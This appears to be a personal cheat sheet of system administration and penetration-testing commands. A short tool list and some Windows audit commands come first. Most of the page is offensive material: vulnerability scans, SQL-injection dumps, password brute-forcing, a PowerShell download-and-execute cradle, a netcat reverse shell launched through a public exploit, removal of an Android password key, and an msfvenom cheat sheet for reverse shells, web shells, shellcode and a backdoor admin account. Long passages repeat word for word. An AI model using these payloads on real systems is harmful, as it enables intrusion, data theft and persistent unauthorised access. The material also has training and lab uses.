Special software for special tasks
- Windows AD audit - Gold Finger
- EXE analysis - PEStudio
- Screen recorder - CamStudio, Faststone, TinyTake
- Analyze hard drive space - WinDirStat, JDiskReport, TreeSize Free
- Secure file deletion - File Shredder
- IT audit - Nsauditor
- Hard drive health - Hard Disk Sentinel
- OCR - ABBYY
- Forensic software - FTK Imager, Autopsy, ProDiscover
- Mobile forensics - Oxygen, MOBILedit
- Image metadata (EXIF) - Exif Reader
- Software firewall - ZoneAlarm, Comodo, pfSense
- RAM capture / memory analysis - DumpIt (capture), Volatility (analysis)
- Bootable USB drive - Universal USB
- Deleted file recovery - Recuva
- Network Administrator tools - https://www.netadmintools.com/
- https://techtalk.gfi.com/top-20-free-digital-forensic-investigation-tools-for-sysadmins/
PC and domain audit
Windows
current user - cmd - query user or whoami
user list - WMIC useraccount get name,sid
RID 1001+ - created user accounts (active); RID 500 - built-in Administrator (often disabled by default)
At the domain controller -
cmd - net user administrator /domain
cmd - gpresult /r - group policy info
Run - rsop.msc - resultant set of policy
Run - gpedit.msc - Local Group Policy Editor (the domain-level Group Policy Management console is gpmc.msc)
Run - gpupdate /force - update group policy
Run - rsop.msc - resultant set of policy
Run - gpedit.msc - Local Group Policy Editor (the domain-level Group Policy Management console is gpmc.msc)
Run - gpupdate /force - update group policy
Mac
Users & Groups
software update -
Applications - hit Command+Shift+A
System Preferences - basic information about the Mac
CMD
query user
wmic baseboard get product,version,serialnumber
net share
runas /user:yourdomain\administrator cmd
doskey /history
ipconfig && mspaint
driverquery
tree
nslookup
route print
systeminfo
netstat -tulpn (Linux syntax; the Windows equivalent is netstat -ano)
Network scan using cmd - C:\Users\user\Desktop>for /L %i in (0,1,255) do ping -n 1 -w 250 192.168.8.%i>>ip-list.txt
gpresult /r
masscan -e tun0 -p0-65535 --max-rate 500 10.10.10.8
nmap -A -p80 10.10.10.8
nmap -sV -O -F --version-light 10.10.10.3 > fullscan.txt
nmap -p 445 --script vuln 10.10.10.4
nmap -Pn --script vuln 192.168.1.105
nmap --script nmap-vulners -sV 11.22.33.44
nmap --script nmap-vulners -sV -p# ###.###.###.###
nmap --script vulscan -sV -p# ###.###.###.###
nmap -sV --script=vulscan/vulscan.nse www.example.com
Android Pen Testing
adb - Android (port 5555)
adb connect 192.168.8.101
adb devices
adb shell
rm -rf password.key
https://devhints.io/adb
Debian
nc -lvnp
rm -r * - delete all files, folders in directory
python -m pyftpdlib -p 21 -w
python -m SimpleHTTPServer
smbclient -L \\\\10.10.10.4\\
smbclient -L=10.10.0.2
smbclient //10.10.10.40/Share
nbtscan 10.0.2.5
python setup.py install
msfconsole -r unicorn.rc - using unicorn.py
add exploits to msfdb
/usr/share/metasploit-framework/modules/exploits
add hostname to /etc/hosts
netstat -alnp | grep 443
kill -9 <pid> (try a plain kill <pid>, i.e. SIGTERM, first)
ssh-keygen
chmod 600 id_rsa (ssh ignores a private key that is group- or world-readable)
ssh -i id_rsa user@10.10.10.200
su admin
$ /bin/bash -i
tcpdump -i <interface> icmp
dig @10.13.37.10 -x 10.13.37.10
pip install -r requirements.txt
davtest -url http://10.10.10.15/
gobuster dir -u http://10.10.10.15/ -w /usr/share/wordlists/dirb/common.txt -t 40 -x .php,.txt,.html
gobuster dir -u http://staging-order.mango.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -c 'PHPSESSID=lsh2usjd9gmtkcevpn1deidtla' -o out.txt
netdiscover -i eth0
netdiscover -i eth0 -r 192.168.1.0/24
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.7:8000/Sherlock.ps1')"
evil-winrm -i 192.168.1.100 -u username -p 'passwd!' -s './' -e './'
sqlmap -r login.req --random-agent --level=5 --risk=3 --dbs
sqlmap -r login.req --random-agent --level=5 --risk=3 -D dbname --tables
sqlmap -r login.req --random-agent --level=5 --risk=3 -D dbname -T tablenm --dump
sqlmap -r search.req --dbms mysql --technique=U --dump --batch
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=Raw-SHA256
curl -vsk http://staging-order.mango.htb/home.php
wfuzz -w wordlist/general/common.txt http://testphp.vulnweb.com/FUZZ
python 47837.py 10.10.10.165 80 whoami
python 47837.py 10.10.10.165 80 “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.140 9001 >/tmp/f”
python -m pyftpdlib -p 21 -w
python -m SimpleHTTPServer
smbclient -L \\\\10.10.10.4\\
smbclient -L=10.10.0.2
smbclient //10.10.10.40/Share
nbtscan 10.0.2.5
python setup.py install
msfconsole -r unicorn.rc - using unicorn.py
add exploits to msfdb
/usr/share/metasploit-framework/modules/exploits
add hostname to /etc/hosts
netstat -alnp | grep 443
kill -9 <pid> (try a plain kill <pid>, i.e. SIGTERM, first)
ssh-keygen
chmod 600 id_rsa (ssh ignores a private key that is group- or world-readable)
ssh -i id_rsa user@10.10.10.200
su admin
$ /bin/bash -i
tcpdump -i <interface> icmp
dig @10.13.37.10 -x 10.13.37.10
pip install -r requirements.txt
davtest -url http://10.10.10.15/
gobuster dir -u http://10.10.10.15/ -w /usr/share/wordlists/dirb/common.txt -t 40 -x .php,.txt,.html
gobuster dir -u http://staging-order.mango.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -c 'PHPSESSID=lsh2usjd9gmtkcevpn1deidtla' -o out.txt
netdiscover -i eth0
netdiscover -i eth0 -r 192.168.1.0/24
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.7:8000/Sherlock.ps1')"
evil-winrm -i 192.168.1.100 -u username -p 'passwd!' -s './' -e './'
sqlmap -r login.req --random-agent --level=5 --risk=3 --dbs
sqlmap -r login.req --random-agent --level=5 --risk=3 -D dbname --tables
sqlmap -r login.req --random-agent --level=5 --risk=3 -D dbname -T tablenm --dump
sqlmap -r search.req --dbms mysql --technique=U --dump --batch
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=Raw-SHA256
curl -vsk http://staging-order.mango.htb/home.php
wfuzz -w wordlist/general/common.txt http://testphp.vulnweb.com/FUZZ
python 47837.py 10.10.10.165 80 whoami
python 47837.py 10.10.10.165 80 “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.140 9001 >/tmp/f”
cp /usr/share/exploitdb/exploits/multiple/remote/10.c .
gcc -o exploit 10.c -lcrypto
./exploit
./exploit <the os type> <ip> -c <open connections>
python -c 'import pty;pty.spawn("/bin/bash")' - spawn an interactive PTY (shell upgrade step, usually done before privilege escalation)
hydra -l mike -P /usr/share/wordlists/rockyou.txt "http-post-form://10.10.216.62:8888/login:user=^USER^&password=^PASS^:Invalid"
scp /home/kali/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh jan@10.10.195.21:/dev/shm
MSFVENOM Cheat Sheet
hydra -l mike -P /usr/share/wordlists/rockyou.txt "http-post-form://10.10.216.62:8888/login:user=^USER^&password=^PASS^:Invalid"
scp /home/kali/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh jan@10.10.195.21:/dev/shm
MSFVENOM Cheat Sheet
List payloads - msfvenom -l
Binaries Payloads
Linux Meterpreter Reverse Shell - msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f elf > shell.elf
Linux Bind Meterpreter Shell - msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=<Remote IP Address> LPORT=<Local Port> -f elf > bind.elf
Linux Bind Shell - msfvenom -p generic/shell_bind_tcp RHOST=<Remote IP Address> LPORT=<Local Port> -f elf > term.elf
Windows Meterpreter Reverse TCP Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f exe > shell.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f exe > shell.exe
Windows Reverse TCP Shell
msfvenom -p windows/shell/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f exe > shell.exe
msfvenom -p windows/shell/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f exe > shell.exe
Windows Encoded Meterpreter Windows Reverse Shell
msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe
msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe
Mac Reverse Shell
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f macho > shell.macho
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f macho > shell.macho
Mac Bind Shell
msfvenom -p osx/x86/shell_bind_tcp RHOST=<Remote IP Address> LPORT=<Local Port> -f macho > bind.macho
msfvenom -p osx/x86/shell_bind_tcp RHOST=<Remote IP Address> LPORT=<Local Port> -f macho > bind.macho
Web Payloads
PHP Meterpreter Reverse TCP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP Meterpreter Reverse TCP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f asp > shell.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f asp > shell.asp
JSP Java Meterpreter Reverse TCP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f war > shell.war
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f war > shell.war
Scripting Payloads
Python Reverse Shell
msfvenom -p cmd/unix/reverse_python LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.py
Python Reverse Shell
msfvenom -p cmd/unix/reverse_python LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.py
Bash Unix Reverse Shell
msfvenom -p cmd/unix/reverse_bash LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.sh
msfvenom -p cmd/unix/reverse_bash LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.sh
Perl Unix Reverse shell
msfvenom -p cmd/unix/reverse_perl LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.pl
msfvenom -p cmd/unix/reverse_perl LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.pl
Shellcode
Windows Meterpreter Reverse TCP Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f <language>
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f <language>
Linux Meterpreter Reverse TCP Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f <language>
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f <language>
Mac Reverse TCP Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f <language>
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f <language>
Create User
msfvenom -p windows/adduser USER=hacker PASS=Hacker123$ -f exe > adduser.exe
msfvenom -p windows/adduser USER=hacker PASS=Hacker123$ -f exe > adduser.exe